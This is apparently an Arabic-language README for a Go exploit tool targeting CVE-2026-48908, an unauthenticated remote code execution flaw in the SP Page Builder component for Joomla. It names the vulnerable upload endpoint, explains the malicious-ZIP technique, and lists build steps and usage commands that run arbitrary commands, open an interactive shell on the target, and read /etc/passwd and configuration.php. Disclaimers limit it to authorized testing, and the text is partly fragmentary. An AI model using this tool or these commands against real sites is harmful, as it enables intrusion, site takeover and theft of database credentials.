
CVE-2026-48908 - SP Page Builder Joomla RCE بدون مصادقة
استغلال إثبات المفهوم لثغرة CVE-2026-48908، وهي ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في مكوّن SP Page Builder لـ Joomla.
CVE-2026-48908 هي ثغرة أمنية حرجة تسمح للمهاجمين غير المصادق عليهم بتنفيذ أكواد عشوائية على تثبيتات Joomla المعرضة للخطر من خلال المعالجة غير الصحيحة لاستخراج ملفات ZIP في مكوّن SP Page Builder.
index.php?option=com_sppagebuilder&task=asset.uploadCustomIconتوجد الثغرة في وظيفة رفع الأصول (asset upload) حيث يقوم التطبيق بالتحقق والاستخراج بشكل غير صحيح لملفات ZIP التي تحتوي على أصول الأيقونات. يمكن للمهاجم إنشاء ملف ZIP خبيث يحمل حمولات PHP يتم استخراجها إلى الدليل المتاح عبر الويب، مما يتيح تنفيذ الأوامر عن بُعد.
golang.org/x/term - أدوات طرفية لإدخال كلمات المرور بشكل آمنgit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
تتوفر الحزم الثنائية المجمّعة في قسم الإصدارات (releases).


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
Target URL of vulnerable Joomla installation (required)
Example: http://target.com or https://target.com
-cmd string
System command to execute on target
Example: "cat /etc/passwd"
-shell
Launch interactive shell on target (requires successful exploitation)
-check
Check if target is vulnerable without attempting exploitation
-cleanup
Remove uploaded shell and artifacts from target
-token string
CSRF token for exploitation (optional, auto-detected if not provided)
تدعم الأداة عدة متجهات للاستغلال:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
إذا كنت تشغّل Joomla مع مكوّن SP Page Builder:
تم توفير هذا البرنامج لأغراض تعليمية ولاختبارات أمنية مصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون المسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة. يتحمل المستخدمون مسؤولية ضمان حصولهم على التفويض المناسب قبل استخدام هذه الأداة على أي نظام مستهدف.
باستخدامك لهذه الأداة، فإنك تقرّ بما يلي:
هذه الأداة مخصصة لأبحاث الأمن الدفاعي واختبارات الاختراق المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر ينتهك قانون الاحتيال وإساءة استخدام الحاسوب (Computer Fraud and Abuse Act) والقوانين المماثلة في الولايات القضائية الأخرى. احرص دائمًا على الحصول على التفويض المناسب كتابيًا قبل إجراء الاختبارات الأمنية.
index.php?option=com_installer&view=manageالمساهمات في البحث الأمني مرحّب بها. يرجى:
GhostGTR666 (Gagaltotal666)
للاستفسارات أو الأسئلة أو المساهمات:
يتم توفير هذا المشروع كما هو لأغراض البحث الأمني. راجع القوانين المحلية المتعلقة بأدوات الأمن واختبار الاختراق قبل الاستخدام.
آخر تحديث: 2026-06-24
إخلاء المسؤولية: هذه الأداة مخصصة للاختبارات الأمنية المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.